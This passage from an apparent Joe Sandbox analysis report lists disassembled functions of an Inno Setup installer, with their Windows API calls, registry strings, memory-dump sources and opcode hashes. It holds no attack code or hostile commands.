                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$EnableEnabledVisible
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3234591441-0
                                                                                                                                                                                                                                  • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                                                                                                                                  • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406288 Relevance: 4.5, APIs: 3, Instructions: 7COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalHandle.KERNEL32 ref: 00406289
                                                                                                                                                                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 00406290
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406295
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$FreeHandleWire
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 318822183-0
                                                                                                                                                                                                                                  • Opcode ID: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                                                                                                                                  • Instruction ID: 0bd3332245bc481727117fba3a6c85ee4c387b864c86d5f24a339be909c9c9d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FA001C4800A01A9DC0432B2080B93B200CD84122C390096B3408BA182887C88401A3D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00469F1C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ActiveWindow
                                                                                                                                                                                                                                  • String ID: PrepareToInstall
                                                                                                                                                                                                                                  • API String ID: 2558294473-1101760603
                                                                                                                                                                                                                                  • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                                                                                                                                  • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046C4BC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: /:*?"<>|
                                                                                                                                                                                                                                  • API String ID: 0-4078764451
                                                                                                                                                                                                                                  • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                                                                                                                                  • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004825C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ActiveWindow
                                                                                                                                                                                                                                  • String ID: InitializeWizard
                                                                                                                                                                                                                                  • API String ID: 2558294473-2356795471
                                                                                                                                                                                                                                  • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                                                                                                                                  • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047C4F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                                                  • API String ID: 47109696-1019749484
                                                                                                                                                                                                                                  • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                                                                                                                                  • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046EE44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID: Inno Setup: Setup Version
                                                                                                                                                                                                                                  • API String ID: 3702945584-4166306022
                                                                                                                                                                                                                                  • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                                                                                                                                  • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046EEB4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID: NoModify
                                                                                                                                                                                                                                  • API String ID: 3702945584-1699962838
                                                                                                                                                                                                                                  • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                                                                                                                                  • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047E474 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                                                                                                                                                    • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                                                                                                                                                    • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                                                                                                                                                    • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(000104B0,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2649214853-0
                                                                                                                                                                                                                                  • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                                                                                                                                  • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047DD98 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                                                                                                                                                    • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMetricsMultiSystemWide
                                                                                                                                                                                                                                  • String ID: /G
                                                                                                                                                                                                                                  • API String ID: 224039744-2088674125
                                                                                                                                                                                                                                  • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                                                                                                                                  • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402088 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 296031713-0
                                                                                                                                                                                                                                  • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                                                                                                                                                  • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042DEC0 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnum
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2818636725-0
                                                                                                                                                                                                                                  • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                                                                                                                  • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004527E8 Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
